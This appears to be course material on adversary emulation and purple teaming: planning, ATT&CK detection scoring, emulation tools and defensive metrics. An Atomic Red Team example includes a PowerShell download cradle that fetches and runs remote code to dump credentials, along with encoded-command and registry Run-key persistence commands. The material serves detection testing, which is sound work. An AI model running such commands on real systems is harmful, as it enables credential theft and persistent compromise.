Opening Framing
You've built detections, deployed controls, and trained your team. But do your defenses actually work against real adversaries? Penetration tests tell you what's exploitable, but not whether you'd detect an attack. Vulnerability scans find weaknesses, but not whether your response is effective. Adversary emulation bridges this gap—testing your defenses by mimicking actual threat actor behavior.
Purple teaming takes this further by combining offensive (red team) and defensive (blue team) efforts in collaborative exercises. Instead of adversarial "red vs. blue" competitions, purple teams work together: red executes techniques while blue validates detection, both sides learning and improving in real-time. This collaborative approach dramatically accelerates defensive maturity.
This week covers adversary emulation methodology, purple team operations, ATT&CK-based testing, emulation tools and frameworks, and measuring defensive effectiveness. You'll learn to validate defenses against realistic threats and continuously improve detection capabilities.
Key insight: The goal isn't to break things—it's to learn whether you'd detect real attacks and improve where you wouldn't.
1) Understanding Adversary Emulation
Adversary emulation differs from traditional security testing by focusing on realistic threat simulation:
Security Testing Spectrum:
┌─────────────────────────────────────────────────────────────┐
│ VULNERABILITY SCANNING │
│ Purpose: Find known vulnerabilities │
│ Method: Automated scanning │
│ Output: List of CVEs and misconfigurations │
│ Limitation: Doesn't test detection/response │
├─────────────────────────────────────────────────────────────┤
│ PENETRATION TESTING │
│ Purpose: Prove exploitability │
│ Method: Exploit vulnerabilities to gain access │
│ Output: Proof of compromise, attack paths │
│ Limitation: Often doesn't mimic real adversary TTPs │
├─────────────────────────────────────────────────────────────┤
│ RED TEAMING │
│ Purpose: Test organization holistically │
│ Method: Realistic adversary simulation │
│ Output: Assessment of security posture │
│ Limitation: May not focus on specific threat actors │
├─────────────────────────────────────────────────────────────┤
│ ADVERSARY EMULATION │
│ Purpose: Test defenses against specific threats │
│ Method: Replicate known adversary TTPs exactly │
│ Output: Validated detection and response capabilities │
│ Focus: Threat-informed, ATT&CK-mapped testing │
├─────────────────────────────────────────────────────────────┤
│ PURPLE TEAMING │
│ Purpose: Collaborative defense improvement │
│ Method: Red + blue working together │
│ Output: Detection improvements, validated capabilities │
│ Focus: Learning and improvement over "winning" │
└─────────────────────────────────────────────────────────────┘
Why Adversary Emulation?
Adversary Emulation Value:
THREAT-INFORMED TESTING:
┌─────────────────────────────────────────────────────────────┐
│ Traditional Pentest: │
│ "Can we get domain admin?" │
│ → Uses whatever techniques work fastest │
│ → May not test your most relevant threats │
│ │
│ Adversary Emulation: │
│ "Can we detect APT29's specific techniques?" │
│ → Uses exact TTPs of relevant threat actor │
│ → Tests defenses against actual threats you face │
└─────────────────────────────────────────────────────────────┘
DETECTION VALIDATION:
┌─────────────────────────────────────────────────────────────┐
│ Problem: Detection rules may look good on paper │
│ │
│ Reality Check: │
│ - Rule may have errors │
│ - Data source may be missing │
│ - Parsing may fail │
│ - Alert may be ignored │
│ - Response may be inadequate │
│ │
│ Emulation: Actually test if detection works end-to-end │
└─────────────────────────────────────────────────────────────┘
ATT&CK COVERAGE MEASUREMENT:
┌─────────────────────────────────────────────────────────────┐
│ Before Emulation: │
│ "We think we detect T1059.001 PowerShell" │
│ │
│ After Emulation: │
│ "We verified detection of 7 of 10 T1059.001 variations" │
│ "We created new rules for the 3 missed variations" │
│ │
│ Value: Confidence based on evidence, not assumption │
└─────────────────────────────────────────────────────────────┘
DEFENSE IMPROVEMENT CYCLE:
┌─────────────────────────────────────────────────────────────┐
│ │
│ ┌──────────────┐ │
│ │ Threat │ │
│ │ Intel │ │
│ └──────┬───────┘ │
│ │ │
│ ▼ │
│ ┌──────────────┐ ┌──────────────┐ │
│ │ Emulate │─────▶│ Detect? │ │
│ │ Technique │ │ (Validate) │ │
│ └──────────────┘ └──────┬───────┘ │
│ ▲ │ │
│ │ ┌──────┴───────┐ │
│ │ │ │ │
│ │ YES ▼ NO ▼ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ Document │ │ Improve │ │
│ │ │ Coverage │ │ Detection│ │
│ │ └──────────┘ └────┬─────┘ │
│ │ │ │
│ └─────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────┘
Emulation Planning:
Emulation Plan Components:
1. THREAT SELECTION
┌─────────────────────────────────────────────────────────────┐
│ Select adversary to emulate based on: │
│ - Relevance to your organization │
│ - Available threat intelligence │
│ - ATT&CK documentation │
│ - Detection gaps to test │
│ │
│ Example: "Emulate FIN7 because they target retail and │
│ we have significant detection gaps in their TTPs" │
└─────────────────────────────────────────────────────────────┘
2. SCOPE DEFINITION
┌─────────────────────────────────────────────────────────────┐
│ Define what will be tested: │
│ - Which phases of kill chain? │
│ - Which specific techniques? │
│ - What systems are in scope? │
│ - What actions are authorized? │
│ - What are safety boundaries? │
│ │
│ Example: "Test initial access through execution phases │
│ on test systems, no actual data exfiltration" │
└─────────────────────────────────────────────────────────────┘
3. TECHNIQUE SEQUENCE
┌─────────────────────────────────────────────────────────────┐
│ Map specific techniques to execute: │
│ │
│ Phase 1: Initial Access │
│ - T1566.001: Spearphishing Attachment (macro document) │
│ │
│ Phase 2: Execution │
│ - T1059.001: PowerShell download cradle │
│ - T1204.002: User execution of malicious file │
│ │
│ Phase 3: Persistence │
│ - T1547.001: Registry Run Key │
│ - T1053.005: Scheduled Task │
│ │
│ Phase 4: Discovery │
│ - T1087.002: Domain Account discovery │
│ - T1018: Remote System Discovery │
└─────────────────────────────────────────────────────────────┘
4. SUCCESS CRITERIA
┌─────────────────────────────────────────────────────────────┐
│ Define what "success" means: │
│ │
│ Detection Success: │
│ - Alert generated within X minutes │
│ - Alert correctly identifies technique │
│ - Alert contains sufficient context │
│ │
│ Response Success: │
│ - Alert triaged within SLA │
│ - Correct escalation path followed │
│ - Containment actions taken │
└─────────────────────────────────────────────────────────────┘
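The four plan components above lend themselves to a machine-readable plan, which keeps exercises repeatable and comparable between quarters. A minimal Python sketch; the adversary name, techniques, and SLA value below are illustrative, not a standard plan format:

```python
from dataclasses import dataclass, field

@dataclass
class PlannedTechnique:
    technique_id: str   # ATT&CK ID, e.g. "T1059.001"
    name: str
    phase: str          # kill-chain phase this test belongs to

@dataclass
class EmulationPlan:
    adversary: str                                   # threat actor emulated
    scope: list = field(default_factory=list)        # in-scope systems
    techniques: list = field(default_factory=list)   # ordered sequence
    detect_sla_minutes: int = 5                      # detection success criterion

    def add(self, technique_id, name, phase):
        self.techniques.append(PlannedTechnique(technique_id, name, phase))

# Illustrative FIN7-style plan mirroring the sequence above
plan = EmulationPlan(adversary="FIN7", scope=["test-ws-01"])
plan.add("T1566.001", "Spearphishing Attachment", "Initial Access")
plan.add("T1059.001", "PowerShell download cradle", "Execution")
plan.add("T1547.001", "Registry Run Key", "Persistence")
print(f"{plan.adversary}: {len(plan.techniques)} techniques planned")
```

Because the plan is data, the same file can drive execution, seed the results tracker, and diff against last quarter's scope.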
Key insight: Adversary emulation is about validated confidence. You move from "we think we detect this" to "we know we detect this."
2) Purple Team Operations
Purple teaming combines red and blue team expertise in collaborative exercises focused on improvement:
Purple Team Model:
TRADITIONAL (Adversarial):
┌─────────────────────────────────────────────────────────────┐
│ │
│ RED TEAM BLUE TEAM │
│ ┌───────────┐ ┌───────────┐ │
│ │ Attack │ vs. │ Defend │ │
│ │ (hidden) │ │ (blind) │ │
│ └───────────┘ └───────────┘ │
│ │
│ - Operates in secret - Discovers attacks │
│ - Goal: Prove compromise - Goal: Detect/respond │
│ - Report at end - Limited learning │
│ │
│ Problems: │
│ - Learning happens only at end │
│ - Red may use techniques irrelevant to real threats │
│ - Blue doesn't know what to improve │
│ - Adversarial relationship │
└─────────────────────────────────────────────────────────────┘
PURPLE TEAM (Collaborative):
┌─────────────────────────────────────────────────────────────┐
│ │
│ RED TEAM BLUE TEAM │
│ ┌───────────┐ ┌───────────┐ │
│ │ Execute │◄────────────────►│ Validate │ │
│ │ Technique │ Collaboration │ Detection │ │
│ └───────────┘ └───────────┘ │
│ │ │ │
│ └───────────┬───────────────────┘ │
│ │ │
│ ┌──────▼──────┐ │
│ │ IMPROVE │ │
│ │ TOGETHER │ │
│ └─────────────┘ │
│ │
│ - Red executes technique │
│ - Blue validates detection (or not) │
│ - Both discuss and improve │
│ - Repeat with next technique │
│ - Learning happens continuously │
└─────────────────────────────────────────────────────────────┘
Purple Team Workflow:
Purple Team Exercise Flow:
PREPARATION (Before Exercise):
┌─────────────────────────────────────────────────────────────┐
│ 1. Select techniques to test │
│ 2. Prepare emulation tools/procedures │
│ 3. Identify expected detections │
│ 4. Set up test environment │
│ 5. Brief all participants │
│ 6. Establish communication channels │
└─────────────────────────────────────────────────────────────┘
EXECUTION (Per Technique):
┌─────────────────────────────────────────────────────────────┐
│ Step 1: RED announces technique to execute │
│ "Executing T1059.001 - PowerShell download cradle" │
│ │
│ Step 2: BLUE prepares to observe │
│ Opens SIEM, EDR, relevant dashboards │
│ │
│ Step 3: RED executes technique │
│ Runs actual PowerShell command │
│ │
│ Step 4: BLUE validates detection │
│ "Alert fired / No alert / Partial detection" │
│ │
│ Step 5: BOTH discuss results │
│ Why detected / why missed │
│ What data was available │
│ How to improve │
│ │
│ Step 6: DOCUMENT findings │
│ Detection status, improvements needed │
│ │
│ Step 7: MOVE to next technique │
└─────────────────────────────────────────────────────────────┘
POST-EXERCISE:
┌─────────────────────────────────────────────────────────────┐
│ - Compile results into coverage matrix │
│ - Prioritize detection improvements │
│ - Create/update detection rules │
│ - Update documentation │
│ - Schedule follow-up testing │
│ - Brief stakeholders on findings │
└─────────────────────────────────────────────────────────────┘
Purple Team Roles:
Purple Team Participants:
RED TEAM OPERATOR:
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Execute techniques as specified │
│ - Document exact commands/actions │
│ - Explain technique variations │
│ - Suggest additional test cases │
│ │
│ Skills Needed: │
│ - Offensive security techniques │
│ - Adversary tool proficiency │
│ - ATT&CK knowledge │
│ - Clear communication │
└─────────────────────────────────────────────────────────────┘
BLUE TEAM ANALYST:
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Monitor for detection during execution │
│ - Validate alerts and logs │
│ - Identify detection gaps │
│ - Propose detection improvements │
│ │
│ Skills Needed: │
│ - SIEM/EDR proficiency │
│ - Detection engineering │
│ - Log analysis │
│ - Threat knowledge │
└─────────────────────────────────────────────────────────────┘
PURPLE TEAM LEAD:
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Plan and coordinate exercise │
│ - Facilitate discussion │
│ - Ensure documentation │
│ - Track findings and improvements │
│ - Report to stakeholders │
│ │
│ Skills Needed: │
│ - Both offensive and defensive understanding │
│ - Project management │
│ - Communication skills │
│ - ATT&CK expertise │
└─────────────────────────────────────────────────────────────┘
DETECTION ENGINEER (Optional):
┌─────────────────────────────────────────────────────────────┐
│ Responsibilities: │
│ - Create/tune detections in real-time │
│ - Implement improvements immediately │
│ - Test new detections │
│ │
│ Value: Immediate improvement, not just documentation │
└─────────────────────────────────────────────────────────────┘
Key insight: Purple teaming is a mindset, not just an activity. It's about red and blue working toward the same goal: better defense.
3) ATT&CK-Based Testing
MITRE ATT&CK provides the framework for structured adversary emulation and detection validation:
ATT&CK Evaluation Methodology:
TECHNIQUE SELECTION:
┌─────────────────────────────────────────────────────────────┐
│ Criteria for selecting techniques to test: │
│ │
│ 1. Threat Relevance │
│ - Used by adversaries targeting your sector │
│ - Part of campaigns you've seen intelligence on │
│ │
│ 2. Detection Gap │
│ - Techniques you're uncertain about detecting │
│ - Low confidence coverage in Navigator │
│ │
│ 3. Critical Techniques │
│ - High-impact techniques (credential access, etc.) │
│ - Techniques used across many adversaries │
│ │
│ 4. Testability │
│ - Can safely execute in your environment │
│ - Tools available for emulation │
└─────────────────────────────────────────────────────────────┘
TECHNIQUE TESTING FRAMEWORK:
┌─────────────────────────────────────────────────────────────┐
│ For each technique, document: │
│ │
│ BEFORE: │
│ - Expected detection (what should fire) │
│ - Data sources required │
│ - Execution method planned │
│ │
│ DURING: │
│ - Exact command/action executed │
│ - Timestamp of execution │
│ - System executed on │
│ │
│ AFTER: │
│ - Detection result (detected/partial/missed) │
│ - Alert details if detected │
│ - Why missed if not detected │
│ - Improvement actions │
└─────────────────────────────────────────────────────────────┘
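The BEFORE/DURING/AFTER fields map naturally onto a small record type, so every execution gets captured the same way. A sketch, assuming Python for exercise tooling; the field names are ours, not a standard schema:

```python
from dataclasses import dataclass, asdict, field
from typing import Optional

@dataclass
class TechniqueTestRecord:
    # BEFORE: what we expect
    technique_id: str
    expected_detection: str
    data_sources: list = field(default_factory=list)
    # DURING: what actually ran
    command: str = ""
    executed_at: str = ""        # ISO-8601 timestamp for blue-team correlation
    target_system: str = ""
    # AFTER: what happened
    result: str = "untested"     # detected / partial / missed
    alert_details: Optional[str] = None
    improvement: Optional[str] = None

rec = TechniqueTestRecord(
    technique_id="T1547.001",
    expected_detection="Sysmon Event ID 13 on Run key write",
    data_sources=["Windows Registry", "Process monitoring"],
)
rec.command = r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /d calc.exe'
rec.result = "detected"
print(asdict(rec)["result"])
```

Serializing these records (e.g. with `asdict`) gives you the raw material for the coverage matrix and scorecards later in this section.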
Detection Scoring:
ATT&CK Detection Scoring System:
DETECTION CATEGORIES:
None (0):
┌─────────────────────────────────────────────────────────────┐
│ - No telemetry collected │
│ - No visibility into technique │
│ - Cannot detect regardless of effort │
│ │
│ Action: Enable required data sources │
└─────────────────────────────────────────────────────────────┘
Telemetry (1):
┌─────────────────────────────────────────────────────────────┐
│ - Data is collected and available │
│ - No detection rule exists │
│ - Could hunt manually but no alert │
│ │
│ Action: Create detection rule │
└─────────────────────────────────────────────────────────────┘
General Detection (2):
┌─────────────────────────────────────────────────────────────┐
│ - Alert fires but generic │
│ - May identify suspicious activity │
│ - Doesn't specifically identify the technique │
│ │
│ Action: Tune for technique specificity │
└─────────────────────────────────────────────────────────────┘
Tactic Detection (3):
┌─────────────────────────────────────────────────────────────┐
│ - Alert fires and identifies the tactic │
│ - "Persistence detected" vs "Registry Run Key detected" │
│ - Useful but not precise │
│ │
│ Action: Enhance for technique-level detection │
└─────────────────────────────────────────────────────────────┘
Technique Detection (4):
┌─────────────────────────────────────────────────────────────┐
│ - Alert specifically identifies the technique │
│ - "T1547.001 Registry Run Key Persistence" │
│ - Provides actionable context │
│ │
│ Target: This is the goal for most techniques │
└─────────────────────────────────────────────────────────────┘
COVERAGE SCORING:
Per Technique:
- Score each variation tested (0-4)
- Average for overall technique score
Per Tactic:
- Average of all technique scores in tactic
Overall:
- Weighted average across all tested techniques
- Track improvement over time
Example Scorecard:
┌──────────────────────┬──────┬──────┬──────┬──────┬───────────┐
│ Technique            │ Var1 │ Var2 │ Var3 │ Avg  │ Status    │
├──────────────────────┼──────┼──────┼──────┼──────┼───────────┤
│ T1059.001 PowerShell │  4   │  4   │  2   │ 3.3  │ Good      │
│ T1547.001 Run Keys   │  4   │  3   │  -   │ 3.5  │ Good      │
│ T1003.001 LSASS      │  2   │  0   │  -   │ 1.0  │ Gap       │
│ T1053.005 Sched Task │  4   │  4   │  4   │ 4.0  │ Excellent │
└──────────────────────┴──────┴──────┴──────┴──────┴───────────┘
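The averaging rules above are simple enough to automate. The sketch below recomputes the example scorecard; the status thresholds (below 2 = Gap, below 4 = Good, 4 = Excellent) are illustrative choices, not part of the scoring system:

```python
def technique_score(variation_scores):
    """Average of tested variations; untested ones (None) are excluded."""
    tested = [s for s in variation_scores if s is not None]
    return round(sum(tested) / len(tested), 1) if tested else None

# Per-variation scores from the example scorecard; None = not tested
scores = {
    "T1059.001": [4, 4, 2],
    "T1547.001": [4, 3, None],
    "T1003.001": [2, 0, None],
    "T1053.005": [4, 4, 4],
}

per_technique = {t: technique_score(v) for t, v in scores.items()}
overall = round(sum(per_technique.values()) / len(per_technique), 2)

for t, avg in per_technique.items():
    # Illustrative status bands, chosen to match the scorecard above
    status = "Gap" if avg < 2 else "Good" if avg < 4 else "Excellent"
    print(f"{t}: {avg} ({status})")
print(f"Overall: {overall}")
```

Running this over each quarter's results gives you the trend line shown later in the coverage matrix.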
MITRE ATT&CK Evaluations:
Learning from ATT&CK Evaluations:
WHAT ARE ATT&CK EVALUATIONS:
┌─────────────────────────────────────────────────────────────┐
│ MITRE Engenuity tests security products against real │
│ adversary TTPs and publishes detailed results │
│ │
│ Value for Defenders: │
│ - See how products detect specific techniques │
│ - Understand detection capabilities │
│ - Compare vendor claims to actual performance │
│ - Learn what "good" detection looks like │
└─────────────────────────────────────────────────────────────┘
EVALUATION ROUNDS:
- APT3 (2018): First evaluation
- APT29 (2020): Russian espionage TTPs
- Carbanak + FIN7 (2021): Financial threat actors
- Wizard Spider + Sandworm (2022): Ransomware + destructive
- Turla (2023): Advanced espionage
USING EVALUATION RESULTS:
┌─────────────────────────────────────────────────────────────┐
│ 1. Review your product's results │
│ 2. Identify techniques with poor detection │
│ 3. Understand WHY detection failed │
│ 4. Implement compensating controls │
│ 5. Request improvements from vendor │
│ 6. Test same techniques in your environment │
└─────────────────────────────────────────────────────────────┘
Example Insight:
"ATT&CK evaluation showed our EDR missed T1055.012
Process Hollowing. We've added compensating Sysmon
detection and opened case with vendor for improvement."
Key insight: ATT&CK provides a common language for discussing detection capabilities. Use it to compare, measure, and improve.
4) Emulation Tools and Frameworks
Various tools enable safe, repeatable adversary emulation:
Emulation Tool Categories:
ATOMIC TEST LIBRARIES:
┌─────────────────────────────────────────────────────────────┐
│ Atomic Red Team: │
│ - Small, focused tests for individual techniques │
│ - Community-maintained library │
│ - Easy to execute, easy to understand │
│ - Maps directly to ATT&CK │
│ │
│ Use Case: Quick technique validation │
│ URL: github.com/redcanaryco/atomic-red-team │
│ │
│ Example: │
│ Invoke-AtomicTest T1059.001 -TestNumbers 1 │
│ # Executes first PowerShell test case │
└─────────────────────────────────────────────────────────────┘
ADVERSARY EMULATION PLATFORMS:
┌─────────────────────────────────────────────────────────────┐
│ MITRE CALDERA: │
│ - Full adversary emulation platform │
│ - Agent-based execution │
│ - Automated attack chains │
│ - Built-in adversary profiles │
│ │
│ Use Case: Automated, complex emulation │
│ URL: github.com/mitre/caldera │
│ │
│ SCYTHE: │
│ - Commercial adversary emulation platform │
│ - Threat intelligence integration │
│ - Detailed reporting │
│ │
│ Infection Monkey (Guardicore): │
│ - Breach and attack simulation │
│ - Network propagation testing │
│ - Zero-trust validation │
└─────────────────────────────────────────────────────────────┘
OFFENSIVE SECURITY TOOLS:
┌─────────────────────────────────────────────────────────────┐
│ Cobalt Strike: │
│ - Professional adversary simulation │
│ - Realistic C2 capabilities │
│ - Used by real adversaries (good for realistic testing) │
│ │
│ Metasploit: │
│ - Open source penetration testing framework │
│ - Extensive module library │
│ - Good for specific technique testing │
│ │
│ Sliver: │
│ - Open source C2 framework │
│ - Cross-platform implants │
│ - Active development │
└─────────────────────────────────────────────────────────────┘
Atomic Red Team Deep Dive:
Using Atomic Red Team:
STRUCTURE:
atomics/
├── T1059.001/ # PowerShell
│ ├── T1059.001.yaml # Test definitions
│ └── T1059.001.md # Documentation
├── T1547.001/ # Registry Run Keys
│ ├── T1547.001.yaml
│ └── T1547.001.md
└── ...
TEST DEFINITION (T1059.001.yaml):
attack_technique: T1059.001
display_name: PowerShell
atomic_tests:
- name: Mimikatz
  description: Download Mimikatz and dump creds
  supported_platforms:
  - windows
  executor:
    command: |
      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/...')"
    name: command_prompt
- name: Encoded Commands
  description: Execute base64 encoded PowerShell
  supported_platforms:
  - windows
  input_arguments:
    encoded_command:
      description: Base64 (UTF-16LE) encoded command
      type: String
      default: "dwBoAG8AYQBtAGkA"  # "whoami"
  executor:
    command: |
      powershell.exe -enc #{encoded_command}
    name: command_prompt
EXECUTION:
# List available tests for technique
Invoke-AtomicTest T1059.001 -ShowDetailsBrief
# Execute specific test
Invoke-AtomicTest T1059.001 -TestNumbers 2
# Execute with custom input
Invoke-AtomicTest T1059.001 -TestNumbers 2 `
  -InputArgs @{"encoded_command"="[base64]"}
# Execute all tests for technique
Invoke-AtomicTest T1059.001
# Cleanup after test
Invoke-AtomicTest T1059.001 -Cleanup
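When driving Atomic tests from a harness (for example, to timestamp each run so blue can correlate alerts), a thin wrapper can assemble the same Invoke-AtomicTest invocations. A sketch that only builds the command line; it assumes the Invoke-AtomicRedTeam PowerShell module is installed on the target:

```python
import datetime

def atomic_command(technique, test_numbers=None, input_args=None, cleanup=False):
    """Build a powershell.exe argument list for one Invoke-AtomicTest run."""
    ps = f"Invoke-AtomicTest {technique}"
    if test_numbers:
        ps += " -TestNumbers " + ",".join(str(n) for n in test_numbers)
    if input_args:
        pairs = ";".join(f'"{k}"="{v}"' for k, v in input_args.items())
        ps += " -InputArgs @{" + pairs + "}"
    if cleanup:
        ps += " -Cleanup"
    return ["powershell.exe", "-Command", ps]

cmd = atomic_command("T1059.001", test_numbers=[2],
                     input_args={"encoded_command": "dwBoAG8AYQBtAGkA"})
print(cmd[2])
# Record execution time so the blue team can correlate SIEM/EDR alerts
executed_at = datetime.datetime.now(datetime.timezone.utc).isoformat()
```

Pair each generated command with its `executed_at` timestamp in your test records; detection delay then falls out of the log timestamps.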
CALDERA Overview:
MITRE CALDERA:
ARCHITECTURE:
┌─────────────────────────────────────────────────────────────┐
│ CALDERA SERVER │
│ ┌─────────────────────────────────────────────────────┐ │
│ │ Adversary Profiles (APT3, APT29, custom) │ │
│ │ Abilities Library (ATT&CK-mapped techniques) │ │
│ │ Planner (how to chain techniques) │ │
│ │ Reporting │ │
│ └─────────────────────────────────────────────────────┘ │
│ │ │
│ ┌────────────┼────────────┐ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌────────┐ ┌────────┐ ┌────────┐ │
│ │ Agent │ │ Agent │ │ Agent │ │
│ │(Target)│ │(Target)│ │(Target)│ │
│ └────────┘ └────────┘ └────────┘ │
└─────────────────────────────────────────────────────────────┘
KEY CONCEPTS:
Abilities:
- Individual techniques mapped to ATT&CK
- Executable commands
- Platform-specific implementations
Adversaries:
- Collections of abilities
- Emulate specific threat actors
- Custom or pre-built
Operations:
- Running an adversary against agents
- Tracks execution and results
- Provides reporting
Planners:
- Determine order of technique execution
- Can be sequential, random, or intelligent
EXAMPLE WORKFLOW:
1. Deploy agents to test systems
2. Select adversary profile (or create custom)
3. Start operation
4. Agents execute techniques
5. Blue team monitors for detection
6. Review results and detection gaps
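CALDERA also exposes a REST API, so the workflow above can be scripted. The sketch below only constructs the request; the `/api/v2/operations` path, `KEY` header, and `ADMIN123` default key match recent CALDERA releases, but treat them as assumptions and verify against your server's version:

```python
import urllib.request

CALDERA_URL = "http://localhost:8888"   # assumed default server address
API_KEY = "ADMIN123"                    # assumed default key; change in production

def list_operations_request():
    """Build (but do not send) a request for current CALDERA operations.

    Endpoint path and KEY header follow CALDERA's v2 API; confirm them
    against your deployment before relying on this."""
    return urllib.request.Request(
        f"{CALDERA_URL}/api/v2/operations",
        headers={"KEY": API_KEY, "Accept": "application/json"},
    )

req = list_operations_request()
print(req.full_url)
# To execute: urllib.request.urlopen(req) against a running server
```

Polling operations this way lets the purple team lead watch technique-by-technique progress alongside the blue team's dashboards.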
Key insight: Tools enable consistent, repeatable testing. Choose based on your needs: quick validation (Atomic) vs. full campaigns (CALDERA, Cobalt Strike).
5) Measuring Defensive Effectiveness
Purple team exercises produce metrics that demonstrate and improve defensive capabilities:
Detection Metrics:
COVERAGE METRICS:
┌─────────────────────────────────────────────────────────────┐
│ ATT&CK Technique Coverage: │
│ - % of relevant techniques with validated detection │
│ - Breakdown by tactic │
│ - Trend over time │
│ │
│ Example: │
│ Execution Techniques: 12/15 detected (80%) │
│ Persistence Techniques: 8/12 detected (67%) │
│ Defense Evasion: 5/18 detected (28%) ← Gap │
└─────────────────────────────────────────────────────────────┘
DETECTION QUALITY:
┌─────────────────────────────────────────────────────────────┐
│ Mean Time to Detect (MTTD): │
│ - How fast does alert fire after technique execution? │
│ - Target: <5 minutes for critical techniques │
│ │
│ Alert Fidelity: │
│ - Does alert correctly identify the technique? │
│ - Is there sufficient context for investigation? │
│ │
│ False Positive Rate: │
│ - How often does detection fire on benign activity? │
│ - Target: <5% false positive rate │
└─────────────────────────────────────────────────────────────┘
RESPONSE METRICS:
┌─────────────────────────────────────────────────────────────┐
│ Mean Time to Respond (MTTR): │
│ - Time from alert to analyst acknowledgment │
│ - Time to investigation completion │
│ - Time to containment action │
│ │
│ Response Accuracy: │
│ - Was the technique correctly identified? │
│ - Were appropriate actions taken? │
│ - Was escalation appropriate? │
└─────────────────────────────────────────────────────────────┘
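MTTD and detection rate fall straight out of the (execution time, alert time) pairs recorded during the exercise. A sketch with illustrative timestamps:

```python
from datetime import datetime

# (technique, executed_at, alert_at); alert_at is None when detection missed.
# Timestamps are illustrative, not from a real exercise.
runs = [
    ("T1059.001", "2024-03-01T10:00:00", "2024-03-01T10:02:30"),
    ("T1547.001", "2024-03-01T10:15:00", "2024-03-01T10:18:00"),
    ("T1003.001", "2024-03-01T10:30:00", None),
]

detected = [(t, e, a) for t, e, a in runs if a is not None]
detection_rate = len(detected) / len(runs)

# Minutes from technique execution to alert, per detected run
delays = [
    (datetime.fromisoformat(a) - datetime.fromisoformat(e)).total_seconds() / 60
    for _, e, a in detected
]
mttd_minutes = sum(delays) / len(delays)

print(f"Detection rate: {detection_rate:.0%}")
print(f"MTTD: {mttd_minutes:.1f} minutes")
```

The same pairs also show which individual techniques blew the SLA, which is usually more actionable than the aggregate mean.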
Tracking Improvement:
Purple Team Results Tracking:
COVERAGE MATRIX:
Technique │Jan│Feb│Mar│Apr│ Trend │
─────────────────┼───┼───┼───┼───┼───────┤
T1059.001 PS │ 2 │ 3 │ 4 │ 4 │ ↑ │
T1547.001 RegRun │ 3 │ 3 │ 4 │ 4 │ ↑ │
T1003.001 LSASS │ 0 │ 1 │ 2 │ 3 │ ↑ │
T1055 Injection │ 0 │ 0 │ 1 │ 2 │ ↑ │
T1021.002 SMB │ 2 │ 2 │ 2 │ 3 │ ↑ │
─────────────────┴───┴───┴───┴───┴───────┘
(0=None, 1=Telemetry, 2=General, 3=Tactic, 4=Technique)
IMPROVEMENT TRACKING:
Q1 2024 Purple Team Results:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Techniques Tested: 45
Detection Rate: 62% (28/45)
Detection Improvements: 12 new rules created
Coverage Increase: +15% from Q4
Gap Analysis:
- Defense Evasion: 28% coverage (Priority 1)
- Credential Access: 45% coverage (Priority 2)
- Collection: 50% coverage (Priority 3)
Remediation Plan:
- 5 new detection rules for Defense Evasion (March)
- Sysmon Event 10 deployment for Cred Access (April)
- Enhanced logging for Collection techniques (May)
Reporting to Stakeholders:
Purple Team Executive Report:
PURPLE TEAM ASSESSMENT - Q1 2024
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
EXECUTIVE SUMMARY
We tested our defenses against 45 techniques used by
threat actors targeting our sector. Detection rate
improved from 47% to 62% since last quarter.
KEY FINDINGS
Detection Strengths:
✓ Initial Access: 85% detection rate
✓ Execution: 80% detection rate
✓ Persistence: 75% detection rate
Detection Gaps:
✗ Defense Evasion: 28% detection rate
(Adversaries using this to avoid detection)
✗ Credential Access: 45% detection rate
(High-impact techniques for privilege escalation)
BUSINESS IMPACT
If attacked by APT group targeting our sector:
- Before Purple Team: ~45% chance of detection
- After Improvements: ~62% chance of detection
- Target (EOY): 80% detection rate
INVESTMENT RECOMMENDATIONS
1. Endpoint visibility enhancement: $50K
Impact: +20% detection coverage
2. Detection engineering sprint: 2 FTE x 1 month
Impact: +15 new detection rules
3. Advanced EDR features: $75K/year
Impact: +10% evasion technique detection
NEXT STEPS
- April: Defense Evasion focused testing
- May: Credential Access technique validation
- June: Re-test all previously failed techniques
Key insight: Metrics turn purple team exercises into business value. Track improvement over time to demonstrate ROI.
Real-World Context
Case Study: Financial Services Purple Team
A large bank implemented monthly purple team exercises focused on FIN7 and Carbanak TTPs—threat groups known to target financial services. First exercise revealed only 35% detection rate for the 40 techniques tested. Most gaps were in defense evasion and lateral movement. Over six months, the team conducted focused exercises each month, implementing detection improvements between sessions. By month six, detection rate reached 78%. More importantly, mean time to detect dropped from 4 hours to 15 minutes for detected techniques. When a real incident occurred (a business email compromise attempt that progressed to internal reconnaissance), SOC detected and contained it within 30 minutes—using detection rules developed during purple team exercises.
Case Study: Healthcare Ransomware Preparedness
A healthcare system used purple teaming to prepare for ransomware attacks. They built an emulation plan based on Conti and LockBit TTPs, testing the complete attack chain from phishing through encryption. Initial exercise was sobering: they detected initial access but missed the entire lateral movement and pre-encryption staging. Purple team identified that their network segmentation was providing false confidence—attackers could move freely once inside trusted segments. They implemented network detection, enhanced endpoint visibility in critical segments, and added behavioral detections for pre-encryption behaviors (volume shadow copy deletion, backup service manipulation). Follow-up exercise showed 85% detection rate with multiple opportunities to stop the attack chain.
Common Purple Team Pitfalls:
What Goes Wrong:
PITFALL: "Check the Box" Exercises
┌─────────────────────────────────────────────────────────────┐
│ Problem: Running exercises for compliance, not improvement │
│ Symptom: Same results year after year │
│ Fix: Focus on improvement metrics, not just completion │
└─────────────────────────────────────────────────────────────┘
PITFALL: Red Team vs. Blue Team Mentality
┌─────────────────────────────────────────────────────────────┐
│ Problem: Adversarial relationship, information hoarding │
│ Symptom: Blue team doesn't learn, red team "wins" │
│ Fix: Emphasize collaboration, shared goals, no "winners" │
└─────────────────────────────────────────────────────────────┘
PITFALL: No Follow-Through
┌─────────────────────────────────────────────────────────────┐
│ Problem: Findings documented but never addressed │
│ Symptom: Same gaps found in every exercise │
│ Fix: Assign owners, track remediation, re-test │
└─────────────────────────────────────────────────────────────┘
PITFALL: Unrealistic Scope
┌─────────────────────────────────────────────────────────────┐
│ Problem: Testing 100 techniques in one day │
│ Symptom: Superficial testing, no time for analysis │
│ Fix: Smaller scope, deeper testing, quality over quantity │
└─────────────────────────────────────────────────────────────┘
